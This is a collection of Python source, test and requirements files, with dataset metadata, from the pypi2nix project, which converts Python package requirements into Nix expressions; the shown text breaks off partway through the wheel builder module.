"alphanum_fraction": 0.5861707925796509, "avg_line_length": 34.35185241699219, "blob_id": "ce1df10a5155e3fb41644930b2e2340e08c8982f", "content_id": "658ab5a51ec76cb358decc6d6f1a45e05b99a274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3818, "license_type": "no_license", "max_line_length": 100, "num_lines": 108, "path": "/src/pypi2nix/pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport re\nfrom functools import lru_cache\nfrom http.client import HTTPException\nfrom typing 
import Optional\nfrom typing import Union\nfrom urllib.request import urlopen\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.version import LegacyVersion\nfrom packaging.version import Version\nfrom packaging.version import parse as parse_version\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi_package import PypiPackage\nfrom pypi2nix.pypi_release import PypiRelease\nfrom pypi2nix.pypi_release import ReleaseType\nfrom pypi2nix.pypi_release import get_release_type_by_packagetype\n\n\n@attrs(frozen=True)\nclass Pypi:\n _logger: Logger = attrib()\n _index: str = attrib(default=\"https://pypi.org/pypi\")\n\n @lru_cache(maxsize=None)\n def get_package(self, name: str) -> PypiPackage:\n def get_release_type(package_type: str) -> ReleaseType:\n release_type = get_release_type_by_packagetype(package_type)\n if release_type is None:\n self._logger.warning(\n f\"Found unexpected `packagetype` entry {package_type} for package `{name}`\"\n )\n return ReleaseType.UNKNOWN\n else:\n return release_type\n\n url = f\"{self._index}/{name}/json\"\n try:\n with urlopen(url) as response_buffer:\n metadata = json.loads(response_buffer.read().decode(\"utf-8\"))\n except HTTPException:\n raise PypiFailed(\n f\"Failed to download metadata information from `{url}`, given package name `{name}`\"\n )\n releases = {\n PypiRelease(\n url=data[\"url\"],\n sha256_digest=data[\"digests\"][\"sha256\"],\n version=version,\n type=get_release_type(data[\"packagetype\"]),\n filename=data[\"filename\"],\n )\n for version, release_list in metadata[\"releases\"].items()\n for data in release_list\n }\n\n return PypiPackage(\n name=metadata[\"info\"][\"name\"],\n releases=releases,\n version=metadata[\"info\"][\"version\"],\n )\n\n def get_source_release(self, name: str, version: str) -> Optional[PypiRelease]:\n def version_tag_from_filename(filename: str) -> Union[Version, LegacyVersion]:\n extension = \"|\".join(\n map(re.escape, [\".tar.gz\", \".tar.bz2\", \".tar\", \".zip\", \".tgz\"])\n )\n regular_expression = r\"{name}-(?P<version>.*)(?P<extension>{extension})$\".format(\n name=re.escape(name), extension=extension\n )\n result = re.match(regular_expression, filename)\n if result:\n return parse_version(result.group(\"version\"))\n else:\n message = f\"Could not guess version of package from url `{filename}`\"\n self._logger.error(message)\n raise PypiFailed(message)\n\n package = self.get_package(name)\n source_releases = [\n release\n for release in package.releases\n if release.type == ReleaseType.SOURCE\n ]\n releases_for_version = (\n release\n for release in source_releases\n if parse_version(release.version) == parse_version(version)\n )\n\n for release in releases_for_version:\n return release\n else:\n releases_for_version_by_filename = (\n release\n for release in source_releases\n if version_tag_from_filename(release.filename) == parse_version(version)\n )\n for release in releases_for_version_by_filename:\n return release\n else:\n return None\n\n\nclass PypiFailed(Exception):\n pass\n" }, { "alpha_fraction": 0.6495956778526306, "alphanum_fraction": 0.671159029006958, "avg_line_length": 32.727272033691406, "blob_id": "da967a0033dcaa7282fed2386fb764110bd3a21c", "content_id": "e44f236f2a8576e6b5b77a3428d38136949554a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 83, "num_lines": 11, "path": "/integrationtests/test_connexion.py", "repo_name": "garbas/pypi2nix", 
"src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass ConnexionTestCase(IntegrationTest):\n name_of_testcase = \"connexion\"\n requirements = [\"connexion\"]\n code_for_testing = [\"import connexion\"]\n constraints = [\"clickclick == 1.2.1\", \"flake8 == 3.7.7\"]\n\n def setup_requires(self):\n return [\"flit\", \"pytest-runner\", \"setuptools-scm\", \"vcversioner\", \"flake8\"]\n" }, { "alpha_fraction": 0.726141095161438, "alphanum_fraction": 0.7302904725074768, "avg_line_length": 17.538461685180664, "blob_id": "688ea229fa39503b4872b292084e5ce5d43fd342", "content_id": "dd314646e55c5e9ebd2ef3614fff04a02d777206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/src/pypi2nix/pypi_package.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Set\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.pypi_release import PypiRelease\n\n\n@attrs\nclass PypiPackage:\n name: str = attrib()\n releases: Set[PypiRelease] = attrib()\n version: str = attrib()\n" }, { "alpha_fraction": 0.5233399271965027, "alphanum_fraction": 0.7120315432548523, "avg_line_length": 16.686046600341797, "blob_id": "de2765b34ae31429c2651a85f8584fbfac538ac8", "content_id": "de53a3a07e2c8edc3059bf33caa3e16776f496c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1521, "license_type": "no_license", "max_line_length": 36, "num_lines": 86, "path": "/requirements_frozen.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "alabaster==0.7.12\nappdirs==1.4.3\nattrs==19.3.0\nBabel==2.8.0\nblack==19.10b0\nbleach==3.1.1\nbumpv==0.3.0\ncertifi==2019.11.28\ncffi==1.14.0\nchardet==3.0.4\nClick==7.0\ncoverage==5.0.3\ncryptography==2.8\ndocutils==0.16\neffect==1.1.0\nentrypoints==0.3\nfancycompleter==0.9.1\nflake8==3.7.9\nflake8-debugger==3.2.1\nflake8-unused-arguments==0.0.3\nflit==2.2.0\nflit-core==2.2.0\nhypothesis==5.6.0\nidna==2.9\nimagesize==1.2.0\nimportlib-metadata==1.5.0\nintreehooks==1.0\nisort==4.3.21\njeepney==0.4.3\nJinja2==2.11.1\njsonschema==3.2.0\nkeyring==21.1.1\nMarkupSafe==1.1.1\nmccabe==0.6.1\nmore-itertools==8.2.0\nmypy==0.761\nmypy-extensions==0.4.3\nnix-prefetch-github==2.3.2\npackaging==20.3\nParsley==1.3\npathspec==0.7.0\npdbpp==0.10.2\npkginfo==1.5.0.1\npluggy==0.13.1\npy==1.8.1\npyaml==19.4.1\npycodestyle==2.5.0\npycparser==2.20\npyflakes==2.1.1\nPygments==2.6.1\npyparsing==2.4.6\npyrepl==0.9.0\npyrsistent==0.15.7\npytest==5.3.5\npytest-cov==2.8.1\npytest-runner==5.2\npytoml==0.1.21\npytz==2019.3\nPyYAML==5.3\nreadme-renderer==24.0\nregex==2020.2.20\nrequests==2.23.0\nrequests-toolbelt==0.9.1\nSecretStorage==3.1.2\nsetupmeta==2.6.20\nsetuptools-scm==3.5.0\nsix==1.14.0\nsnowballstemmer==2.0.0\nsortedcontainers==2.1.0\nSphinx==2.4.4\nsphinxcontrib-applehelp==1.0.2\nsphinxcontrib-devhelp==1.0.2\nsphinxcontrib-htmlhelp==1.0.3\nsphinxcontrib-jsmath==1.0.1\nsphinxcontrib-qthelp==1.0.3\nsphinxcontrib-serializinghtml==1.1.4\ntoml==0.10.0\ntqdm==4.43.0\ntwine==3.1.1\ntyped-ast==1.4.1\ntyping-extensions==3.7.4.1\nurllib3==1.25.8\nwcwidth==0.1.8\nwebencodings==0.5.1\nwmctrl==0.3\nzipp==3.1.0\n" }, { "alpha_fraction": 0.6192052960395813, "alphanum_fraction": 0.620309054851532, "avg_line_length": 26.876922607421875, "blob_id": "a022e4ea9748e2f9fd8ae516535836dcaa538c55", "content_id": "d32b9cc132413b61a112eae19db2e0a7db32ede1", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3624, "license_type": "no_license", "max_line_length": 76, "num_lines": 130, "path": "/src/pypi2nix/logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom enum import unique\nfrom typing import Optional\nfrom typing import TextIO\n\n\nclass LoggerNotConnected(Exception):\n pass\n\n\n@unique\nclass Verbosity(Enum):\n ERROR = -1\n WARNING = 0\n INFO = 1\n DEBUG = 2\n\n\nVERBOSITY_MIN: int = min(*map(lambda v: v.value, Verbosity)) # type: ignore\nVERBOSITY_MAX: int = max(*map(lambda v: v.value, Verbosity)) # type: ignore\n\n\ndef verbosity_from_int(n: int) -> Verbosity:\n for verbosity_level in Verbosity:\n if verbosity_level.value == n:\n return verbosity_level\n if n < VERBOSITY_MIN:\n return Verbosity.ERROR\n else:\n return Verbosity.DEBUG\n\n\nclass Logger(metaclass=ABCMeta):\n @abstractmethod\n def error(self, text: str) -> None:\n pass\n\n @abstractmethod\n def warning(self, text: str) -> None:\n pass\n\n @abstractmethod\n def info(self, text: str) -> None:\n pass\n\n @abstractmethod\n def debug(self, text: str) -> None:\n pass\n\n @abstractmethod\n def set_verbosity(self, level: Verbosity) -> None:\n pass\n\n\nclass StreamLogger(Logger):\n def __init__(self, output: TextIO):\n self.output = output\n self.verbosity_level: Verbosity = Verbosity.DEBUG\n\n def warning(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.WARNING.value:\n for line in text.splitlines():\n print(\"WARNING:\", line, file=self.output)\n\n def error(self, text: str) -> None:\n for line in text.splitlines():\n print(\"ERROR:\", line, file=self.output)\n\n def info(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.INFO.value:\n for line in text.splitlines():\n print(\"INFO:\", line, file=self.output)\n\n def debug(self, text: str) -> None:\n if self.verbosity_level.value >= Verbosity.DEBUG.value:\n for line in text.splitlines():\n print(\"DEBUG:\", line, file=self.output)\n\n def set_verbosity(self, level: Verbosity) -> None:\n self.verbosity_level = level\n\n @classmethod\n def stdout_logger(constructor) -> StreamLogger:\n return constructor(sys.stdout)\n\n\nclass ProxyLogger(Logger):\n def __init__(self) -> None:\n self._target_logger: Optional[Logger] = None\n\n def info(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.info(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def debug(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.debug(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def warning(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.warning(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def error(self, text: str) -> None:\n if self._target_logger is not None:\n self._target_logger.error(text)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def set_verbosity(self, level: Verbosity) -> None:\n if self._target_logger is not None:\n self._target_logger.set_verbosity(level)\n else:\n raise LoggerNotConnected(\"Logger not connected\")\n\n def set_target_logger(self, target: Logger) -> None:\n self._target_logger = target\n\n def get_target_logger(self) -> Optional[Logger]:\n return self._target_logger\n" }, { 
"alpha_fraction": 0.6129707098007202, "alphanum_fraction": 0.6129707098007202, "avg_line_length": 21.23255729675293, "blob_id": "309b63086d0a3949f160f5a27b382c50738d8ef8", "content_id": "b181a787fe1259297b52e3882263ce807a128af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 956, "license_type": "no_license", "max_line_length": 74, "num_lines": 43, "path": "/scripts/run_integration_tests.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport argparse\nimport os\nimport shlex\nimport subprocess\n\nfrom repository import ROOT\n\n\ndef generator(iterable):\n yield from iterable\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\", default=None)\n args = parser.parse_args()\n return args.file\n\n\ndef run_tests_from_file(path: str) -> None:\n command = [\"python\", \"-m\", \"unittest\", path, \"-k\", \"TestCase\"]\n print(\"Executing test: \", \" \".join(map(shlex.quote, command)))\n subprocess.run(command, check=True)\n\n\ndef main():\n file = parse_args()\n if file:\n files = generator([file])\n else:\n files = (\n os.path.join(ROOT, \"integrationtests\", name)\n for name in os.listdir(os.path.join(ROOT, \"integrationtests\"))\n if name.startswith(\"test_\") and name.endswith(\".py\")\n )\n for path in files:\n run_tests_from_file(path)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6884422302246094, "alphanum_fraction": 0.7035176157951355, "avg_line_length": 29.615385055541992, "blob_id": "33facc41cd2e9045af648b346955d140b8aaa5f3", "content_id": "a7dac45ededc6d2af7b19b8da9be9496342548f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 77, "num_lines": 13, "path": "/integrationtests/test_rss2email.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\nfrom .framework import TestCommand\n\n\nclass Rss2EmailTestCase(IntegrationTest):\n name_of_testcase = \"rss2email\"\n code_for_testing = [\"import rss2email\"]\n requirements = [\n \"https://github.com/wking/rss2email/archive/master.zip#egg=rss2email\"\n ]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"r2e\", \"--help\"])]\n" }, { "alpha_fraction": 0.7102563977241516, "alphanum_fraction": 0.7102563977241516, "avg_line_length": 34.45454406738281, "blob_id": "e8719d8b131f46d57a00c648d1df683a89fa23ba", "content_id": "160e3ea62d90bf1320e2717aaf58d22cd19d0239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 76, "num_lines": 11, "path": "/integrationtests/test_awscli_and_requests.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\nfrom .framework import TestCommand\n\n\nclass AwscliAndRequestsTestCase(IntegrationTest):\n name_of_testcase = \"awscli_and_requests\"\n requirements = [\"awscli\", \"requests\"]\n code_for_testing = [\"import awscli\", \"import requests\"]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"aws\", \"help\"], env={\"PAGER\": \"none\"})]\n" }, { "alpha_fraction": 0.8846153616905212, "alphanum_fraction": 0.8846153616905212, "avg_line_length": 51, "blob_id": "30511410ce408ed244361e891eece3b4e6cb5578", "content_id": "fa48664281b590d3c0a4fa7fe937feb2c4bb2e44", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/src/pypi2nix/external_dependencies/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .external_dependency import ExternalDependency\n" }, { "alpha_fraction": 0.7033798098564148, "alphanum_fraction": 0.70881587266922, "avg_line_length": 33.398372650146484, "blob_id": "830950d3d9ba6e65bc2744d1575f5ff854068446", "content_id": "62a0a9003910696f6ec366e079c5e18ef834c611", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4231, "license_type": "permissive", "max_line_length": 88, "num_lines": 123, "path": "/unittests/test_requirement_parser.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\nfrom parsley import ParseError\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\n\nfrom .logger import get_logger_output\n\n\ndef test_parses_pip_style_url(requirement_parser):\n requirement_parser.compiled_grammar()(\n \"git+https://github.com/nix-community/pypi2nix.git\"\n ).URI_pip_style()\n\n\ndef test_parse_pip_style_requirement(requirement_parser):\n requirement_parser.compiled_grammar()(\n \"git+https://github.com/nix-community/pypi2nix.git#egg=pypi2nix\"\n ).url_req_pip_style()\n\n\ndef test_that_python_implemntation_marker_can_be_parsed(requirement_parser):\n requirement_parser.compiled_grammar()(\n 'testspec; python_implementation == \"CPython\"'\n )\n\n\n@pytest.mark.parametrize(\"path\", (\"/test/path\", \"./test/path\", \"test/path\", \"./.\"))\ndef test_that_file_path_with_leading_slash_can_be_parsed(path, requirement_parser):\n assert requirement_parser.compiled_grammar()(path).file_path() == path\n\n\n@pytest.mark.parametrize(\n \"path\", (\"#\", \"/#/\", \"/test#/\", \"#/test\", \"path/test#egg=testegg\")\n)\ndef test_that_path_with_hashpound_is_not_recognized(path, requirement_parser):\n with pytest.raises(ParseError):\n requirement_parser.compiled_grammar()(path).file_path()\n\n\ndef test_that_we_can_parse_pip_style_requirement_with_file_path(requirement_parser):\n requirement = requirement_parser.compiled_grammar()(\n \"path/to/egg#egg=testegg\"\n ).path_req_pip_style()\n assert requirement.name() == \"testegg\"\n assert requirement.path() == \"path/to/egg\"\n\n\n@pytest.mark.parametrize(\n \"line\",\n (\n \"cffi>=1.8,!=1.11.3; python_implementation != 'PyPy'\",\n \"cffi>=1.1; python_implementation != 'PyPy'\",\n \"cffi>=1.4.1; python_implementation != 'PyPy'\",\n ),\n)\ndef test_regressions_with_cryptography(\n requirement_parser: RequirementParser, line: str, logger: Logger\n) -> None:\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"cffi\"\n assert \"WARNING\" in get_logger_output(logger)\n assert \"PEP 508\" in get_logger_output(logger)\n\n\ndef test_that_path_is_parsed_to_path_requirement(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"local_path/egg#egg=local-path\")\n assert isinstance(requirement, PathRequirement)\n\n\ndef test_that_requirement_parser_does_not_choke_on_sys_dot_platform(\n requirement_parser: RequirementParser, logger: Logger\n):\n line = 'macfsevents ; sys.platform == \"darwin\"'\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"macfsevents\"\n assert \"WARNING\" in 
get_logger_output(logger)\n assert \"PEP 508\" in get_logger_output(logger)\n\n\ndef test_that_comment_is_parsed_correctly(requirement_parser: RequirementParser):\n comment_string = \"# this is a comment\"\n result = requirement_parser.compiled_grammar()(comment_string).comment()\n assert result == \"this is a comment\"\n\n\ndef test_that_comment_without_string_after_it_is_parsed_correctly(\n requirement_parser: RequirementParser,\n):\n comment_string = \"#\"\n result = requirement_parser.compiled_grammar()(comment_string).comment()\n assert result == \"\"\n\n\ndef test_that_name_requirements_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"requirement # comment\"\n result = requirement_parser.compiled_grammar()(line).name_req()\n assert result.name() == \"requirement\"\n\n\ndef test_that_url_req_can_have_comments(requirement_parser: RequirementParser):\n line = \"test @ https://test.url # comment\"\n result = requirement_parser.compiled_grammar()(line).url_req()\n assert result.name() == \"test\"\n\n\ndef test_that_url_req_pip_style_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"https://test.url#egg=test # comment\"\n result = requirement_parser.compiled_grammar()(line).url_req_pip_style()\n assert result.name() == \"test\"\n\n\ndef test_that_path_req_pip_style_can_have_comments(\n requirement_parser: RequirementParser,\n):\n line = \"/path/requirement#egg=test # comment\"\n result = requirement_parser.compiled_grammar()(line).path_req_pip_style()\n assert result.name() == \"test\"\n" }, { "alpha_fraction": 0.6782987713813782, "alphanum_fraction": 0.6859323978424072, "avg_line_length": 29.566667556762695, "blob_id": "71dc0aca93d70d1d51bcba4e7b273d8823b73ea1", "content_id": "732186d11c1b5c9f0090f37e4efcc73c86091d4c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "permissive", "max_line_length": 86, "num_lines": 30, "path": "/unittests/test_archive.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\n\n\n@pytest.fixture(params=(\"tar\", \"zip\", \"bz2\"))\ndef archive(\n request, test_zip_path: str, test_tar_gz_path: str, test_tar_bz2_path: str\n) -> Archive:\n if request.param == \"tar\":\n return Archive(path=test_tar_gz_path)\n elif request.param == \"bz2\":\n return Archive(path=test_tar_bz2_path)\n else:\n return Archive(path=test_zip_path)\n\n\ndef test_that_we_can_inspect_the_content_of_an_archive(archive: Archive):\n with archive.extracted_files() as directory:\n files = tuple(os.listdir(directory))\n assert files == (\"test.txt\",)\n\n\ndef test_that_we_can_inspect_the_content_of_a_wheel(setupcfg_package_wheel_path: str):\n archive = Archive(path=setupcfg_package_wheel_path)\n with archive.extracted_files() as directory:\n assert \"setupcfg_package-1.0.dist-info\" in os.listdir(directory)\n" }, { "alpha_fraction": 0.6598557829856873, "alphanum_fraction": 0.671875, "avg_line_length": 19.799999237060547, "blob_id": "029ab5ba8012900d8b7f680f572cbbcc26b96709", "content_id": "1a7cbc02e6d61706c99363b703c32be13e1834c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 79, "num_lines": 40, "path": "/src/pypi2nix/pypi_release.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom enum import 
unique\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\n\n\n@unique\nclass ReleaseType(Enum):\n UNKNOWN = 0\n SOURCE = 1\n WHEEL = 2\n EGG = 3\n WIN_INSTALLER = 4\n RPM = 5\n MSI = 6\n\n\n_release_type_mapping = {\n \"sdist\": ReleaseType.SOURCE,\n \"bdist_wheel\": ReleaseType.WHEEL,\n \"bdist_egg\": ReleaseType.EGG,\n \"bdist_wininst\": ReleaseType.WIN_INSTALLER,\n \"bdist_rpm\": ReleaseType.RPM,\n \"bdist_msi\": ReleaseType.MSI,\n}\n\n\ndef get_release_type_by_packagetype(packagetype: str) -> Optional[ReleaseType]:\n return _release_type_mapping.get(packagetype)\n\n\n@attrs(frozen=True)\nclass PypiRelease:\n url: str = attrib()\n sha256_digest: str = attrib()\n version: str = attrib()\n type: ReleaseType = attrib()\n filename: str = attrib()\n" }, { "alpha_fraction": 0.7144535779953003, "alphanum_fraction": 0.7162162065505981, "avg_line_length": 30.518518447875977, "blob_id": "39efdb60e28fdedff99c8060c885daa3c6eb9cf3", "content_id": "2dd82849a5969445588290feedd6c2202b3b5c81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "permissive", "max_line_length": 82, "num_lines": 54, "path": "/unittests/test_requirements_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements_file import RequirementsFile\n\n\n@pytest.fixture\ndef requirements_file_from_lines(\n project_dir, tmpdir_factory, requirement_parser, logger: Logger\n):\n def factory(lines):\n requirements_file = tmpdir_factory.mktemp(\"test\").join(\"requirements.txt\")\n requirements_file.write(\"\\n\".join(lines))\n return RequirementsFile(\n str(requirements_file), project_dir, requirement_parser, logger\n )\n\n return factory\n\n\ndef test_requirements_file_handles_comments(requirements_file_from_lines):\n requirements_file = requirements_file_from_lines([\"# comment\"])\n requirements_file.process()\n\n\ndef test_requirements_file_handles_empty_lines(requirements_file_from_lines):\n requirements_file = requirements_file_from_lines([\"\"])\n requirements_file.process()\n\n\ndef test_requirements_file_can_be_created_from_requirements_lines(\n project_dir: str, requirement_parser: RequirementParser, logger: Logger\n):\n RequirementsFile.from_lines(\n [\"pytest\"],\n requirement_parser=requirement_parser,\n project_dir=project_dir,\n logger=logger,\n )\n\n\ndef test_regular_requirements_stay_in_processed_file(\n project_dir: str, requirement_parser: RequirementParser, logger: Logger\n):\n requirement_file = RequirementsFile.from_lines(\n [\"pytest\"],\n requirement_parser=requirement_parser,\n project_dir=project_dir,\n logger=logger,\n )\n processed_file = requirement_file.processed_requirements_file_path()\n with open(processed_file) as f:\n assert \"pytest\" in f.read()\n" }, { "alpha_fraction": 0.6330221891403198, "alphanum_fraction": 0.6872811913490295, "avg_line_length": 33.62626266479492, "blob_id": "29cd5ee1c71a61f7dead9f0eb7d70a17df78bf26", "content_id": "0cd75fb4f2d11f8029ab1de2e0e856740800bab9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "permissive", "max_line_length": 127, "num_lines": 99, "path": "/unittests/test_network_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\n\nimport 
pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.network_file import DiskTextFile\nfrom pypi2nix.network_file import GitTextFile\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.network_file import UrlTextFile\nfrom pypi2nix.nix import Nix\n\nfrom .switches import nix\n\n\n@nix\ndef test_calculate_sha256_for_text_file(logger: Logger):\n test_file = UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n assert \"*.pyc\" in test_file.fetch()\n assert \"0b2s1lyfr12v83rrb69j1cfcsksisgwyzfl5mix6qz5ldxfww8p0\" == test_file.sha256\n\n\n@nix\ndef test_can_evaluate_expression_of_fetched_file(logger: Logger, nix: Nix) -> None:\n test_file = UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n nix.build_expression(\n expression=f\"let pkgs = import <nixpkgs> {{}}; in {test_file.nix_expression() }\"\n )\n\n\n@nix\ndef test_can_calculate_hash_for_git_files(logger: Logger):\n repository_url = \"https://github.com/nix-community/pypi2nix.git\"\n path = \".gitignore\"\n revision_name = \"e56cbbce0812359e80ced3d860e1f232323b2976\"\n network_file = GitTextFile(\n repository_url=repository_url,\n revision_name=revision_name,\n path=path,\n logger=logger,\n )\n\n assert network_file.sha256 == \"1vhdippb0daszp3a0m3zb9qcb25m6yib4rpggaiimg7yxwwwzyh4\"\n assert \"*.pyc\" in network_file.fetch()\n\n\n@nix\ndef test_can_evaluate_nix_expression(network_file: NetworkFile, nix: Nix):\n expression = f\"let pkgs = import <nixpkgs> {{}}; in {network_file.nix_expression()}\"\n nix.evaluate_expression(expression)\n\n\n@nix\ndef test_fetch_content_equals_file_content_from_nix_expression(\n network_file: NetworkFile, nix: Nix\n):\n fetch_content = network_file.fetch()\n\n nix_expression = \"with builtins;\"\n nix_expression += \"let pkgs = import <nixpkgs> {};\"\n nix_expression += f\"fileContent = readFile ({network_file.nix_expression()});\"\n nix_expression += \" in \"\n nix_expression += 'pkgs.writeTextFile { name = \"test\"; text = fileContent; }'\n with tempfile.TemporaryDirectory() as target_directory:\n target_file = os.path.join(target_directory, \"result\")\n nix.build_expression(nix_expression, out_link=target_file)\n with open(target_file) as f:\n nix_content = f.read()\n assert nix_content == fetch_content\n\n\n@pytest.fixture(params=[\"url\", \"git\", \"disk\"])\ndef network_file(logger: Logger, request, data_directory):\n if request.param == \"url\":\n return UrlTextFile(\n url=\"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\",\n logger=logger,\n name=\"testname\",\n )\n elif request.param == \"disk\":\n return DiskTextFile(path=os.path.join(data_directory, \"test.txt\"),)\n else:\n repository_url = \"https://github.com/nix-community/pypi2nix.git\"\n path = \".gitignore\"\n revision_name = \"e56cbbce0812359e80ced3d860e1f232323b2976\"\n return GitTextFile(\n repository_url=repository_url,\n revision_name=revision_name,\n path=path,\n logger=logger,\n )\n" }, { "alpha_fraction": 0.6565113663673401, "alphanum_fraction": 0.6580047607421875, "avg_line_length": 39.09580993652344, "blob_id": "851abadca2c15cd75b7f2aebe0bf2532571e73d2", "content_id": "ba839f64ad33cde51d511faa6d5c7e655ae649b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 6696, "license_type": "no_license", "max_line_length": 88, "num_lines": 167, "path": "/src/pypi2nix/wheel_builder.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import zipfile\nfrom copy import copy\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package import DistributionNotDetected\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass WheelBuilder:\n def __init__(\n self,\n pip: Pip,\n download_directory: Path,\n wheel_directory: Path,\n extracted_wheel_directory: Path,\n lib_directory: Path,\n logger: Logger,\n requirement_parser: RequirementParser,\n target_platform: TargetPlatform,\n base_dependency_graph: DependencyGraph,\n ) -> None:\n self.pip = pip\n self._download_directory = download_directory\n self._wheel_directory = wheel_directory\n self._extracted_wheels_directory: Path = extracted_wheel_directory\n self.inspected_source_distribution_files: Set[Path] = set()\n self.target_platform = target_platform\n self.source_distributions: Dict[str, SourceDistribution] = dict()\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.lib_directory = lib_directory\n self._dependency_graph = base_dependency_graph\n\n def build(\n self,\n requirements: RequirementSet,\n setup_requirements: Optional[RequirementSet] = None,\n ) -> List[str]:\n self.ensure_download_directory_exists()\n self._ensure_wheels_directory_exists()\n if not setup_requirements:\n setup_requirements = RequirementSet(self.target_platform)\n else:\n self.logger.info(\"Downloading setup requirements\")\n setup_requirements = (\n self.detect_additional_build_dependencies(setup_requirements)\n + setup_requirements\n )\n self.logger.info(\"Installing setup requirements\")\n self.pip.install(\n setup_requirements,\n target_directory=self.lib_directory,\n source_directories=[self._download_directory],\n )\n self.logger.info(\"Downloading runtime requirements\")\n requirements = requirements + setup_requirements\n detected_requirements = 